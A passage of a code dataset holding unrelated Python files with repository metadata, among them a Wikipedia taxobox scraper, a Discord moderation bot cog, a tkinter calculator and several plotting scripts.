\n\t\tdest='mountpoint',\n\t\ttype='string',\n\t\thelp='Directory where the partition will be mount.')\n#\n\tparser.add_option('-o',\n\t\t'--options',\n\t\tdest='mountoptions',\n\t\ttype='string',\n\t\thelp='mounting options to be added')\n#\n\tparser.add_option('--umount',\n\t\taction=\"store_true\",\n\t\tdest='doumount',\n\t\tdefault=False)\n#\n\t(options, args) = parser.parse_args()\n\tif len(args) != 0:\n\t\tparser.error('incorrect number of arguments')\n\tmounted = o2tf.CheckMounted(options.DEBUGON, logfile, \n\t\toptions.mountpoint)\n\tif options.domount:\n\t\tif not options.mountpoint:\n\t\t\tparser.error('Please specify mountpoint.')\n\t\tif not options.label:\n\t\t\tparser.error('Please specify Label.')\n\t\tif options.mountoptions:\n\t\t\tmt_options = '-o %s' %(options.mountoptions)\n\t\telse:\n\t\t\tmt_options = ''\n\t\tif not mounted:\n\t\t\to2tf.SudoMount(options.DEBUGON, logfile, \n\t\t\t\t options.mountpoint, options.label,\n\t\t\t\t mt_options)\n\t\telse:\n\t\t\to2tf.printlog('Partition already mounted.',\n\t\t\t\tlogfile, 0, '')\n\t\t\tsys.exit(1)\n\n\tif options.doumount:\n\t\tif not options.mountpoint:\n\t\t\tparser.error('Please specify mountpoint.')\n\t\tif mounted:\n\t\t\to2tf.SudoUmount(options.DEBUGON, logfile, \n\t\t\t\toptions.mountpoint)\n\t\telse:\n\t\t\to2tf.printlog('Partition not mounted.',\n\t\t\t\tlogfile, 0, '')\n\t\t\tsys.exit(1)\n#\n","repo_name":"markfasheh/ocfs2-test","sub_path":"programs/python_common/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"17465036066","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skued import baseline_dt, gaussian\n\nfrom dissutils import MEDIUM_FIGURE_WIDTH, discrete_colors, tag_axis\n\ns, intensity = np.load(Path(\"data\") / \"appendix\" / \"rutile_vo2.npy\")\nq = 4 * np.pi * s\n\n# Double exponential inelastic background and substrate effects\ndiffuse = 75 * np.exp(-7 * s) + 55 * np.exp(-2 * s)\nsubstrate1 = 0.8 * gaussian(s, center=s.mean(), fwhm=s.mean() / 4)\nsubstrate2 = 0.9 * gaussian(s, center=s.mean() / 2.5, fwhm=s.mean() / 4)\n\nsignal = intensity + diffuse + substrate1 + substrate2\n\nfig, (ax1, ax2) = plt.subplots(\n nrows=2,\n ncols=1,\n sharex=True,\n figsize=(MEDIUM_FIGURE_WIDTH, MEDIUM_FIGURE_WIDTH),\n)\n\nbest_baseline = baseline_dt(signal, level=7, max_iter=150, wavelet=\"qshift3\")\nfor trace, color, label in zip(\n [signal, signal - intensity, best_baseline],\n discrete_colors(3),\n [\"signal\", \"background\", \"baseline\"],\n):\n ax1.plot(q, trace, \"-\", color=color, label=label)\n\nax1.set_ylim([28, 73])\nax1.legend(edgecolor=\"none\", ncol=3, loc=\"center\", bbox_to_anchor=(0.5, 1.1))\n\nc1, c2 = discrete_colors(2)\nax2.plot(q, intensity, \"-\", color=c1, label=\"True intensity\")\nax2.plot(\n q,\n signal - baseline_dt(signal, level=7, max_iter=150, wavelet=\"qshift3\"),\n color=c2,\n label=\"Background-subtracted\",\n)\nax2.set_xlabel(\"$|\\mathbf{q}|$ ($\\AA^{-1}$)\")\nax2.set_xlim([0.2 * 4 * np.pi, 0.4 * 4 * np.pi])\nax2.legend(\n edgecolor=\"none\", ncol=2, loc=\"center\", bbox_to_anchor=(0.5, 1.1), framealpha=0\n)\n\nfor ax, label in zip([ax1, ax2], [\"a)\", \"b)\"]):\n ax.set_ylabel(\"Intensity [a.u.]\")\n tag_axis(ax, label, x=0.96, horizontalalignment=\"right\", y=0.9)\n\nplt.tight_layout()\n","repo_name":"LaurentRDC/dissertation","sub_path":"figures/appendix/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"37739926439","text":"'''\n2020-07-06\n[from dailycodingproblem.com #27]\n\nGiven a string of round, curly, and square open and closing brackets, return \nwhether the brackets are balanced (well-formed).\n\nFor example, given the string \"([])[]({})\", you should return true.\nGiven the string \"([)]\" or \"((()\", you should return false.\n'''\n\ndef balanced(string):\n # start with placeholder to avoid index error / clumsy empty list checking\n ledger = [' '] \n\n for s in string:\n last_open_bracket = ledger[-1]\n \n if s not in '({[]})':\n pass\n if s in '({[':\n if last_open_bracket not in ' ({[':\n return False\n ledger.append(s)\n elif s in ')}]':\n if (\n (s == ')' and last_open_bracket == '(') or\n (s == '}' and last_open_bracket == '{') or\n (s == ']' and last_open_bracket == '[')\n ):\n ledger.pop()\n else:\n return False\n \n if ledger[-1] != ' ':\n return False\n return True\n\n\n'''\n# TESTS (must all return True)\n\n# Base cases from question\nbalanced(\"([])[]({})\") == True\nbalanced(\"([)]\") == False\nbalanced(\"((()\") == False\n\nbalanced(\"((((((((((asdf))))))))))\") == True\nbalanced(\"((((((((((asdf)))))))))))))\") == False\n\n# No brackets should still return True\nbalanced(\"asdf\") == True \n\n# Starting with a closing bracket should return False\nbalanced(\"]asdf[\") == False\nbalanced(\"))asdf((\") == False\nbalanced(\"}}}asdf\") == False\n'''\n","repo_name":"ermanh/dailycoding","sub_path":"20200706_balanced_brackets.py","file_name":"20200706_balanced_brackets.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34409033875","text":"# coding: utf-8 \nfrom bs4 import BeautifulSoup as bs\nfrom urllib.request import urlopen\nimport wikipedia\nimport utils\nimport sys\nimport json\n\nclass WikipediaQueryEngine:\n '''\n This query and scraping class is only relevant for the html structure of wikipedia\n pages around 2016.\n '''\n scraped_pages_by_url = {}\n results_by_tuple = {}\n\n def __init__(self):\n wikipedia.set_lang(\"fr\")\n\n def build_binominal_name_for_query(self, genus, species):\n infered_binominal_name = genus+' '+species\n infered_binominal_name = infered_binominal_name.replace(' x ', ' ×')\n return infered_binominal_name\n\n def build_species_name_from_binominal_name(self, binominal_name, genus):\n binominal_name_words = binominal_name.split()\n normalized_genus = utils.normalize(genus)\n species_words = []\n for binominal in binominal_name_words:\n normalized_binominal = utils.normalize(binominal)\n if normalized_binominal != normalized_genus:\n species_words.append(normalized_binominal)\n species = \"\"\n for word in species_words:\n species += word.lower() + ' '\n return species.strip()\n\n def enrich_data(self, name_french, genus, species):\n \"\"\"\n Returns a dictionary in the form of:\n {\n \"genus\" : \"...\"\n \"species\" : \"...\"\n \"genus_page\" : {\n \"url\" : \"...\"\n \"page_title\" : \"...\"\n \"page_subtitle\" : \"...\"\n \"description\" : \"...\"\n }\n \"species_page\" : {\n \"url\" : \"...\"\n \"page_title\" : \"...\"\n \"page_subtitle\" : \"...\"\n \"description\" : \"...\"\n }\n \"info_french\" : {\n ...\n }\n }\n \"\"\"\n\n if (name_french, genus, species) in WikipediaQueryEngine.results_by_tuple:\n return WikipediaQueryEngine.results_by_tuple[(name_french, genus, species)]\n\n undefined_species = False\n\n # This step is important : when names such as \"Erable indéterminé\" come up,\n # Wikipedia API often gives strange results (\"Erable indéterminé\" ~> \"Violon\")\n words = name_french.split()\n name = \"\"\n for word in words:\n if(utils.normalize(word) == 'indetermine'):\n undefined_species = True\n else:\n name += word+' '\n name = name.strip()\n\n result = { 'genus':'', 'genus_page':{}, 'species':'', 'species_page':{}, 'info_french':{} }\n\n if(undefined_species):\n # We only have to find a genus page\n queries_for_genus = set()\n queries_for_genus.add(genus)\n queries_for_genus.add(name.split()[0])\n queries_for_genus.add(name)\n\n for query_for_genus in queries_for_genus:\n genus_page = self.find_genus_page_for(query_for_genus)\n if genus_page:\n result[\"genus_page\"] = genus_page.copy()\n result[\"genus\"] = genus_page[\"info_french\"][\"Genre\"]\n break\n else:\n # We have to find a genus page AND a species page\n species_page = self.find_species_page_for(name)\n if not species_page :\n # plant name did not return a species page, use binominal name build from genus and species names\n species_page = self.find_species_page_for(self.build_binominal_name_for_query(genus, species))\n if species_page:\n # we finaly found a species page\n result[\"species_page\"] = species_page.copy()\n result[\"species\"] = self.build_species_name_from_binominal_name(species_page[\"info_french\"][\"Nom binominal\"], species_page[\"info_french\"][\"Genre\"])\n\n # And also the corresponding genus page\n genus_page = self.find_genus_page_for(name)\n queries_for_genus = set()\n if species_page:\n queries_for_genus.add(species_page[\"info_french\"][\"Genre\"])\n if name.strip():\n queries_for_genus.add(name.split()[0])\n queries_for_genus.add(genus)\n for query_for_genus in queries_for_genus:\n genus_page = self.find_genus_page_for(query_for_genus)\n if genus_page:\n result[\"genus_page\"] = genus_page.copy()\n result[\"genus\"] = genus_page[\"info_french\"][\"Genre\"]\n break\n\n max_page_info = {}\n if \"genus_page\" in result and result[\"genus_page\"]:\n max_page_info = result[\"genus_page\"][\"info_french\"].copy()\n del result[\"genus_page\"][\"info_french\"]\n\n species_page_info = {}\n if \"species_page\" in result and result[\"species_page\"]:\n species_page_info = result[\"species_page\"][\"info_french\"].copy()\n del result[\"species_page\"][\"info_french\"]\n\n max_page_info.update(species_page_info)\n\n if max_page_info:\n result[\"info_french\"] = max_page_info\n\n WikipediaQueryEngine.results_by_tuple[(name_french, genus, species)] = result.copy()\n\n return result\n\n def find_genus_page_for(self, query):\n return self.find_page_for(query, species=False)\n\n def find_species_page_for(self, query):\n return self.find_page_for(query, species=True)\n\n def find_page_for(self, query, species=True):\n \"\"\"\n Returns a dictionary in the form of:\n {\n \"url\" : \"...\"\n \"page_title\" : \"...\"\n \"page_subtitle\" : \"...\"\n \"description\" : \"...\"\n \"info_french\" : \"...\"\n }\n \"\"\"\n results = {}\n\n # query wikipedia API\n try:\n page = wikipedia.page(wikipedia.search(query)[0])\n url = page.url\n\n page_results = {}\n\n # scrape given url\n if url in WikipediaQueryEngine.scraped_pages_by_url:\n page_results = WikipediaQueryEngine.scraped_pages_by_url[url]\n else:\n page_results = self.scrape_page(url)\n WikipediaQueryEngine.scraped_pages_by_url[url] = page_results\n\n # check if page is relevant (must refer to a plantae)\n if \"Règne\" not in page_results[\"info_french\"] or utils.normalize(page_results[\"info_french\"][\"Règne\"]) != \"plantae\":\n raise Exception\n\n if species:\n # Check if page is species\n if(\"Nom binominal\" not in page_results[\"info_french\"]):\n # Page is not a species\n raise Exception\n else:\n results[\"info_french\"] = page_results[\"info_french\"].copy()\n results[\"url\"] = page.url\n results[\"page_title\"] = page.title\n if(\"page_subtitle\" in page_results):\n results[\"page_subtitle\"] = page_results[\"page_subtitle\"]\n else:\n results[\"page_subtitle\"] = \"\"\n results[\"description\"] = page.summary\n else :\n # Check if page is genus\n if(\"Genre\" not in page_results[\"info_french\"] or \"Nom binominal\" in page_results[\"info_french\"]):\n # Not a genus\n raise Exception\n else:\n results[\"info_french\"] = page_results[\"info_french\"].copy()\n results[\"url\"] = page.url\n results[\"page_title\"] = page.title\n if(\"page_subtitle\" in page_results):\n results[\"page_subtitle\"] = page_results[\"page_subtitle\"]\n else:\n results[\"page_subtitle\"] = \"\"\n results[\"description\"] = page.summary\n except:\n results = {}\n\n return results\n\n def scrape_page(self, url):\n\n results = {}\n\n raw = urlopen(url)\n soup = bs(raw, \"html.parser\")\n info = {}\n try:\n tables = soup.find_all('table',{'class':'taxobox_classification'})\n for table in tables:\n for tr in table.find_all('tr') :\n th = tr.find('th')\n td = tr.find('td')\n info[th.text] = td.text\n center_taxoboxes = soup.find_all('p',{'class':'center taxobox_classification'})\n for center_taxobox in center_taxoboxes:\n center_taxobox_title = center_taxobox.find_previous_sibling('p').get_text()\n\n if(center_taxobox_title == 'Nom binominal' or center_taxobox_title == 'Hybride'):\n binominal = center_taxobox.select('span[lang=\\\"la\\\"]')[0].get_text().replace(\"×\", \"× \")#binominal\n info[\"Nom binominal\"] = binominal\n elif(center_taxobox_title == 'Genre'):\n info[\"Genre\"] = center_taxobox.select('span[lang=\\\"la\\\"]')[0].get_text()\n\n subtitle_spans = soup.select('span#sous_titre_h1')\n if subtitle_spans is not None:\n subtitle = \"\"\n if(len(subtitle_spans)>0):\n subtitle = subtitle_spans[0].text\n for i in range(len(subtitle_spans)-1):\n subtitle += ' / '+subtitle_spans[i+1].text\n if(subtitle.strip()):\n results[\"page_subtitle\"] = subtitle\n results[\"info_french\"] = info\n except:\n results[\"info_french\"] = {}\n\n return results\n\nw = WikipediaQueryEngine()\n\nres = w.enrich_data(\"nyssa sylvatica\", \"nyssa\", \"sylvatica\")\n\nprint(res)\n","repo_name":"Romathonat/PagesVertes","sub_path":"scripts/wikipediaQueryEngine.py","file_name":"wikipediaQueryEngine.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41117746075","text":"# Imports from 3rd party libraries\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Imports from this application\nfrom app import app\n\n# 1 column layout\n# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout\ncolumn1 = dbc.Col(\n [\n dcc.Markdown(\n \"\"\"\n \n ## Data\n The data used for this process includes the individual batting statistics for international players per match \n and the statistics for team match results in International Twenty Twenty Cricket. I took the two datasets and merged them together \n so that I can use both player stats and team stats to fit into my model. The data was sourced from \n https://data.world/cclayford/cricinfo-statsguru-data.\n\n ## Process\n\n I split the data into a training set, a validation set and a test set. For the training set I used the year 2014-2017,\n for the validation set I used the year 2018 and for the test set I used 2019. My target in this data is the 'Result' column\n which contains the value 'Won' or 'Lost'. I used my training set to find a baseline. \n Lost 0.548154 \n Won 0.451846 \n \n The Majority class is the value 'Lost' and gives me a baseline accuracy of 0.548154.\n\n I used Logistic Regression, XGBoost, Decision Tree and Random Forests with Ordinal encoding and \n OneHotEncoding to see which model can give me the most accurate predictions. OneHotEncoding gave me\n significantly higher scores so that is what I used to continue.\n I ended up with the following scores:\n\n\n\n \"\"\"\n ),\n html.Img(src='assets/accScores.PNG', width=\"35%\", height=\"35%\", \n\t\t\t\t className='img-fluid'),\n dcc.Markdown(\n \"\"\"\n \n Decision tree and Random forests had the best scores and were significantly above the baseline but they \n were very close to each other. I decided to get the Permutation Importances to see if Isolating to more important features \n might help me obtain a better score.\n\n\n \"\"\"\n ),\n html.Img(src='assets/permutation.PNG', width=\"20%\", height=\"20%\", \n\t\t\t\t className='img-fluid'),\n dcc.Markdown(\n \"\"\"\n \n I tried my model a few more times using the the best features from the permutation importances but\n always ended up with a much lower score.\n Since Decision tree and Random Forests had scores that were so close to each other I decided to investigate \n further to see which one had the more accurate model. I used the test data for each to plot a confusion matrix.\n the Decision tree is on the left and the Random forests is on the right.\n\n\n \"\"\"\n ),\n html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/treeMatrix.PNG', width=\"25%\", height=\"25%\", \n\t\t\t\t className='img-fluid'),\n html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/forestMatrix.PNG', width=\"25%\", height=\"25%\", \n\t\t\t\t className='img-fluid'),\n dcc.Markdown(\n \"\"\"\n \n The two models still had very similar figures so I decided to get the ROC AUC score and plot the ROC curve to make\n a more definitive comparison.\n\n\n \"\"\"\n ),\n html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/rocScores.PNG', width=\"35%\", height=\"35%\", \n\t\t\t\t className='img-fluid'),\n html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/rocCurve.PNG', width=\"40%\", height=\"40%\", \n\t\t\t\t className='img-fluid'),\n dcc.Markdown(\n \"\"\"\n \n Finally with an ROC score of almost 0.84 I concluded that my Random forests model was my most accurate model.\n I used the predictions from this model to create my predictions page which shows the actual and predicted\n win rate of T20I teams side by side.\n\n\n \"\"\"\n ),\n\n ],\n)\n\nlayout = dbc.Row([column1])","repo_name":"alfaroqueIslam/cricket-match-results","sub_path":"pages/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28570504549","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\n\ndef process(in_file):\n\n\tanno_len = []\n\tanno_ex = []\n\tnovel_len = []\n\tnovel_ex = []\n\n\twith open(in_file, 'r') as df:\n\t\tline = True\n\t\twhile line:\n\t\t\tline = df.readline()\n\t\t\titems = line.split('\\t')\n\t\t\tloc = items[0]\n\t\t\ttry:\n\t\t\t\ttrans_len = int(items[4]) - int(items[3])\n\t\t\t\ttrans_ex = (len(items) - 5) / 2\n\t\t\texcept IndexError:\n\t\t\t\tcontinue\n\n\t\t\tif loc == 'annotated':\n\t\t\t\tanno_len.append(trans_len)\n\t\t\t\tanno_ex.append(trans_ex)\n\t\t\telse:\n\t\t\t\tnovel_len.append(trans_len)\n\t\t\t\tnovel_ex.append(trans_ex)\n\n\treturn [anno_len, anno_ex, novel_len, novel_ex]\n\nuniq_ngs = process('D:\\\\MCGDYY\\\\ont_project\\\\ont_vs_ngs\\\\assem\\\\st_sclp.txt')\nuniq_ont = process('D:\\\\MCGDYY\\\\ont_project\\\\ont_vs_ngs\\\\assem\\\\st_sclp.txt')\nngs_ont = process('D:\\\\MCGDYY\\\\ont_project\\\\ont_vs_ngs\\\\assem\\\\st_sclp.txt')\n\n\"\"\"\n1\tuniq_ont_len\t2\tuniq_ont_ex\n\n3\tintersec_len\t4\tintersec_ex\n\n5\tuniq_ngs_len\t6\tuniq_ngs_ex\n\n\"\"\"\nfig, axes = plt.subplots(3, 2, sharex = 'col', sharey = 'row')\n\n# 1\nsns.kdeplot(ax = axes[0, 0], data = np.log10(uniq_ont[0]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[0, 0], data = np.log10(uniq_ont[2]), shade = True, color = \"r\")\n\n# 2\nsns.kdeplot(ax = axes[0, 1], data = np.log10(uniq_ont[1]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[0, 1], data = np.log10(uniq_ont[3]), shade = True, color = \"r\")\n\n# 3\nsns.kdeplot(ax = axes[1, 0], data = np.log10(ngs_ont[0]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[1, 0], data = np.log10(ngs_ont[2]), shade = True, color = \"r\")\n\n# 4\nsns.kdeplot(ax = axes[1, 1], data = np.log10(ngs_ont[1]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[1, 1], data = np.log10(ngs_ont[3]), shade = True, color = \"r\")\n\n# 5\nsns.kdeplot(ax = axes[2, 0], data = np.log10(uniq_ngs[0]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[2, 0], data = np.log10(uniq_ngs[2]), shade = True, color = \"r\")\n\n# 6\nsns.kdeplot(ax = axes[2, 1], data = np.log10(uniq_ngs[1]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[2, 1], data = np.log10(uniq_ngs[3]), shade = True, color = \"r\")\n\naxes[1, 0].set_ylabel('Density')\naxes[2, 0].set_xlabel('Log10(transcript length in bp)')\naxes[2, 1].set_xlabel('Exon number')\n\nplt.show()","repo_name":"indigoblueraspberry/ONT_RNAseq_project","sub_path":"ont_vs_ngs/plot_ngs_ont_trans_len_ex.py","file_name":"plot_ngs_ont_trans_len_ex.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19239908821","text":"# def add(a,b):\n# c = a + b\n# return c\n#\n# def add1(d,f=3):\n# g = d + f\n# print(g)\n#\n# add1(add(1,2)) #把函数 add的返回值当做 add1的形参\n\n\nDONGWU = []\n\ndef add_Dongwu(dw):\n DONGWU.append(dw)\n print(DONGWU)\n\nadd_Dongwu(\"cat\")","repo_name":"yan0728/xuelei","sub_path":"study/函数.py","file_name":"函数.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12384223094","text":"import discord\nimport traceback\nimport sys\nfrom discord.ext import commands\n\n\nclass Example(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n # Events\n @commands.Cog.listener()\n async def on_ready(self):\n print('CMDS has connected to Bot!')\n\n # Commands\n @commands.command()\n async def ping(self, ctx):\n await ctx.send('Pong!')\n\n @commands.command(aliases=['c'])\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n try:\n await ctx.channel.purge(limit=amount)\n except:\n await ctx.channel.purge(limit=2)\n\n @commands.command(aliases=['k'])\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason=\"No reason provided\"):\n await ctx.send(F\"{member.name} has been kicked from the Server, Because: {reason}\")\n await member.kick(reason=reason)\n\n @commands.command(aliases=['b'])\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason=\"No reason provided\"):\n await ctx.send(F\"{member.name} has been banned from the Server, Because: {reason}\")\n await member.ban(reason=reason)\n\n\ndef setup(bot):\n bot.add_cog(Example(bot))\n","repo_name":"awkwardfault/bot-not-working","sub_path":"cogs/cmds.py","file_name":"cmds.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74928693904","text":"# ==============================================\r\n# * * Question : Simple Calculator (Gui - File)\r\n# * * Author : Alhasan Gamal Mahmoud\r\n# * * Date : 24 - 12 - 2021\r\n# ===============================================\r\n# * Import Every thing from tkinter\r\nfrom tkinter import *\r\n# * globally declare the expression variable\r\n\r\nexp = \"\"\r\n\r\n# * Function to Update the exp in Text Entry Box\r\n\r\n\r\ndef pres(num):\r\n global exp\r\n\r\n # * String Concatenation\r\n\r\n exp += str(num)\r\n\r\n # * Update the expresion\r\n\r\n equation.set(exp)\r\n\r\n# * Evaluate the final expression\r\n\r\n\r\ndef equalpress():\r\n try:\r\n global exp\r\n\r\n # * Write Expression in file\r\n\r\n file.write(exp)\r\n\r\n # * using eval function to calculate expression\r\n\r\n total = str(eval(exp))\r\n equation.set(total)\r\n\r\n # * Write = total and make new line in file\r\n\r\n file.write(\" = \")\r\n file.write(total)\r\n file.write(\"\\n\")\r\n\r\n # * add to total to expression and continuo equation\r\n\r\n exp = total\r\n except:\r\n equation.set(\" Error \")\r\n file.write(\" = \")\r\n file.write(\"Error!\")\r\n file.write(\"\\n\")\r\n exp = \"\"\r\n\r\n# * Clearing the Contents of the Calculator\r\n\r\n\r\ndef clear():\r\n global exp\r\n exp = \"\"\r\n equation.set(exp)\r\n\r\n# * BackSpace Element of Equation\r\n\r\n\r\ndef backspace():\r\n global exp\r\n exp = exp[:-1]\r\n equation.set(exp)\r\n\r\n\r\n# * Creat a GUI\r\nif __name__ == '__main__':\r\n window = Tk()\r\n\r\n # * Crate File and Append in it\r\n\r\n file = open(\"Calculator.txt\", \"a\")\r\n\r\n # * Set Background Color\r\n\r\n window.config(background=\"gray\")\r\n\r\n # * Set Title\r\n\r\n window.title(\"Simple Calculator\")\r\n\r\n # * Set the size of window\r\n\r\n window.geometry(\"390x340\")\r\n\r\n equation = StringVar()\r\n\r\n # * Function for Creating the EntryBox for Typing the Text for Operation\r\n\r\n exp_field = Entry(window, textvariable=equation, font=\"lucida 12 bold\")\r\n\r\n # * Using the Grid Method for Assigning the Widgets at their respective positions.\r\n\r\n exp_field.grid(columnspan=4, ipadx=102, ipady=32)\r\n\r\n # * create the Buttons and position them inside the window.\r\n\r\n bton1 = Button(window, text=' 1 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(1), height=1, width=7)\r\n bton1.grid(row=2, column=0)\r\n\r\n bton2 = Button(window, text=' 2 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(2), height=1, width=7)\r\n bton2.grid(row=2, column=1)\r\n\r\n bton3 = Button(window, text=' 3 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(3), height=1, width=7)\r\n bton3.grid(row=2, column=2)\r\n\r\n bton4 = Button(window, text=' 4 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(4), height=1, width=7)\r\n bton4.grid(row=3, column=0)\r\n\r\n bton5 = Button(window, text=' 5 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(5), height=1, width=7)\r\n bton5.grid(row=3, column=1)\r\n\r\n bton6 = Button(window, text=' 6 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(6), height=1, width=7)\r\n bton6.grid(row=3, column=2)\r\n\r\n bton7 = Button(window, text=' 7 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(7), height=1, width=7)\r\n bton7.grid(row=4, column=0)\r\n\r\n bton8 = Button(window, text=' 8 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(8), height=1, width=7)\r\n bton8.grid(row=4, column=1)\r\n\r\n bton9 = Button(window, text=' 9 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(9), height=1, width=7)\r\n bton9.grid(row=4, column=2)\r\n\r\n bton0 = Button(window, text=' 0 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(0), height=1, width=7)\r\n bton0.grid(row=5, column=0)\r\n\r\n bton_plus = Button(window, text=' + ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"+\"), height=1, width=7)\r\n bton_plus.grid(row=2, column=3)\r\n\r\n bton_minus = Button(window, text=' - ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"-\"), height=1, width=7)\r\n bton_minus.grid(row=3, column=3)\r\n\r\n bton_multiply = Button(window, text=' * ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=lambda: pres(\"*\"), height=1, width=7)\r\n bton_multiply.grid(row=4, column=3)\r\n\r\n bton_divide = Button(window, text=' / ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"/\"), height=1, width=7)\r\n bton_divide.grid(row=5, column=3)\r\n\r\n bton_equal = Button(window, text=' = ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=equalpress, height=1, width=7)\r\n bton_equal.grid(row=6, column=1)\r\n\r\n bton_power = Button(window, text=' ^ ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"**\"), height=1, width=7)\r\n bton_power.grid(row=5, column=2)\r\n\r\n bton_sqr = Button(window, text=' sqr ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"**0.5\"), height=1, width=7)\r\n bton_sqr.grid(row=6, column=0)\r\n\r\n bton_moduls = Button(window, text=' % ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"%\"), height=1, width=7)\r\n bton_moduls.grid(row=6, column=2)\r\n\r\n bton_int_divid = Button(window, text=' // ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=lambda: pres(\"//\"), height=1, width=7)\r\n bton_int_divid.grid(row=6, column=3)\r\n\r\n bton_decimal = Button(window, text=' . ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=lambda: pres(\".\"), height=1, width=7)\r\n bton_decimal.grid(row=5, column=1)\r\n\r\n bton_clear = Button(window, text=' Clear ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=clear, height=1, width=7)\r\n bton_clear.grid(row=7, column=0)\r\n\r\n backspace = Button(window, text=' Del ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=backspace, height=1, width=7)\r\n backspace.grid(row=7, column=1)\r\n\r\n # * Start GUI\r\n\r\n window.mainloop()\r\n\r\n # * Close File\r\n\r\n file.close()\r\n","repo_name":"alhasangamal/Simple-Calcultor","sub_path":"Calcultor.py","file_name":"Calcultor.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42404171174","text":"from tkinter import Checkbutton, Tk , BOTH,Text,Button,LEFT,RIGHT,S\nfrom tkinter.ttk import Frame,Label\n\nclass Example(Frame):\n def __init__(self,parent):\n Frame.__init__(self,parent, name = \"frame\")\n self.parent = parent\n self.initUi()\n\n def initUi(self):\n self.parent.title(\"Event window\")\n self.pack(fill = BOTH, expand = True) \n\n btn = Button(self, text=\"button\" , command = self.onButton1click)\n btn.pack(side = LEFT, padx = 15)\n\n cBtn = Checkbutton(self, text = \"checkButton\", command = self.onbutton2click)\n cBtn.pack(side = LEFT,anchor=S)\n\n def onbutton2click(self):\n print(\"check button has been clicked\") \n \n def onButton1click(self):\n print(\"push button has been clicked\")\n\n\nclass main():\n root = Tk()\n root.geometry(\"250x150+300+300\")\n app = Example(root)\n root.mainloop()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ansah-98/tkinter","sub_path":"events/btn.py","file_name":"btn.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6508784346","text":"from contextlib import contextmanager\n\nimport pytest\n\n\n@contextmanager\ndef check_for_console_errors(page_context):\n errors = []\n page_context.on(\n \"console\", lambda msg: errors.append(msg.text) if msg.type == \"error\" else 